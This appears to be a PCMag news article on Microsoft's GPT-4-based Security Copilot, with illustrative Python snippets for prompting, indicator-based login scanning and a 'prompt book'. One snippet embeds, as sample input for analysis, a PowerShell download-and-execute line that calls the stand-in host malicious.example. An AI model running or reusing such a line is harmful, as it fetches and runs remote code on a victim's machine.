
Microsoft Uses ChatGPT Tech to Help Security Industry Fend Off … – PCMag


Microsoft is bringing the technology behind ChatGPT to the cybersecurity industry by designing a program smart enough to help IT professionals fend off attacks. 

Security Copilot is a virtual assistant that can help IT staffers analyze and pounce on security threats facing their organization. “With Security Copilot, defenders can respond to security incidents within minutes instead of hours or days,” the company says.

The program is essentially an analysis tool that incorporates the capabilities of OpenAI’s newest GPT-4 language model, which can summarize large volumes of text, write professional-grade responses, and even write computer code.

How the program works. (Credit: Microsoft)

Like ChatGPT, Security Copilot functions in a prompt bar. In a demo, Microsoft showed you can ask it for a summary of a new vulnerability, submit a suspected malicious file for analysis, or ask it to report the latest security incidents that occurred inside an internal network.

In return, Security Copilot can fetch data from Microsoft’s other security products, including the company’s threat intelligence, to come up with the appropriate response. 
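Microsoft hasn’t published how Security Copilot wires prompts to its back-end data, but the general pattern of pairing a GPT-4 prompt with retrieved security context can be sketched with OpenAI’s public Chat Completions API. The model name, system prompt, and the threat-intelligence snippet below are illustrative assumptions, not Microsoft’s actual integration.

```python
# Rough sketch of a GPT-4-backed "prompt bar": retrieved security context is
# folded into the prompt before the question is sent to the model.
# Uses OpenAI's public Chat Completions API; everything else is an assumption.
from openai import OpenAI

client = OpenAI()  # reads OPENAI_API_KEY from the environment

# Hypothetical context an assistant might pull from a threat-intelligence feed.
threat_intel = (
    "CVE-2023-23397: Microsoft Outlook elevation-of-privilege vulnerability, "
    "exploitable via a crafted message that triggers an NTLM credential leak."
)

response = client.chat.completions.create(
    model="gpt-4",
    messages=[
        {"role": "system",
         "content": "You are a security assistant. Answer using the provided "
                    "threat intelligence and say when information is missing."},
        {"role": "user",
         "content": f"Threat intel:\n{threat_intel}\n\n"
                    "Summarize this vulnerability and suggest mitigation steps."},
    ],
)

print(response.choices[0].message.content)
```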

In another example, the program was smart enough to analyze the source of an attack, identifying which device was infected, the domain the attack came through, and the system processes involved. An IT security analyst can also use the tool to scan a corporate network’s emails and logins for patterns that match suspected threats.
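Security Copilot presumably does this at far greater scale and with AI-assisted matching, but a bare-bones sense of the underlying idea, checking sign-in records against known indicators of compromise, might look like the sketch below. The log format, field names, and indicator values are invented for the example.

```python
# A deliberately simple, non-AI illustration of scanning login events for
# matches against known-bad domains and IP addresses.
suspicious_domains = {"evil-updates.example", "malicious-cdn.example"}
suspicious_ips = {"203.0.113.45"}

logins = [
    {"user": "alice", "source_ip": "198.51.100.7", "referrer_domain": "intranet.local"},
    {"user": "bob", "source_ip": "203.0.113.45", "referrer_domain": "evil-updates.example"},
]

def flag_suspicious(events):
    """Return events whose source IP or referrer domain matches a known indicator."""
    return [
        e for e in events
        if e["source_ip"] in suspicious_ips or e["referrer_domain"] in suspicious_domains
    ]

for event in flag_suspicious(logins):
    print(f"ALERT: login by {event['user']} matched a known indicator: {event}")
```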

The program generating a security report. (Credit: Microsoft)

The program’s other powerful capability is a “prompt book,” a collection of saved prompts that automates a task in Security Copilot. In the demo, Microsoft showed one such prompt book causing Security Copilot to reverse-engineer a malicious script in seconds, generating a report that highlighted the various attributes of the attack.
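Microsoft hasn’t documented the prompt-book format, but the concept of replaying an ordered list of prompts so a multi-step investigation runs without re-typing each step can be sketched as follows. The steps, the sample script, and the wiring to OpenAI’s public API are all assumptions made for illustration.

```python
# A hypothetical "prompt book": an ordered list of prompts run in sequence
# against the model, with each answer kept in the conversation history.
from openai import OpenAI

client = OpenAI()

# Placeholder for the script under investigation; in practice this would be
# the suspected malicious PowerShell read from disk.
malware_script = "IEX (New-Object Net.WebClient).DownloadString('http://malicious.example/payload.ps1')"

prompt_book = [
    "Deobfuscate the following PowerShell and describe what it does:\n" + malware_script,
    "List the indicators of compromise (domains, IPs, file paths) found in the script.",
    "Write a short incident report summarizing the script's behavior for a non-technical audience.",
]

history = [{"role": "system", "content": "You are a malware analysis assistant."}]
for step in prompt_book:
    history.append({"role": "user", "content": step})
    reply = client.chat.completions.create(model="gpt-4", messages=history)
    answer = reply.choices[0].message.content
    history.append({"role": "assistant", "content": answer})
    print(answer)
```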


The program reverse-engineering a PowerShell script. (Credit: Microsoft)

The results promise to streamline cybersecurity work, freeing up humans to focus on more pressing tasks. The capabilities were enough to impress the research firm Forrester at a time when data breaches and ransomware attacks remain rampant. “This is the first time a product is poised to deliver on true improvement to investigation and response with AI,” Forrester Senior Analyst Allie Mellen said in a statement.

That said, Microsoft concedes Copilot won’t always generate an accurate response. In one example, the company showed Copilot referencing “Windows 9,” a non-existent OS, in an answer about the scope of a security threat. However, users will be able to flag incorrect responses. “As we continue to learn from these interactions, we are adjusting its responses to create more coherent, relevant and useful answers,” the company adds. 

Microsoft says all the data entered into the program remains private. In addition, the company plans on expanding Security Copilot so that it can connect with third-party security products. However, it’ll take a while before Microsoft releases the program to the cybersecurity industry. Security Copilot is currently in preview; expect more details in the coming months.
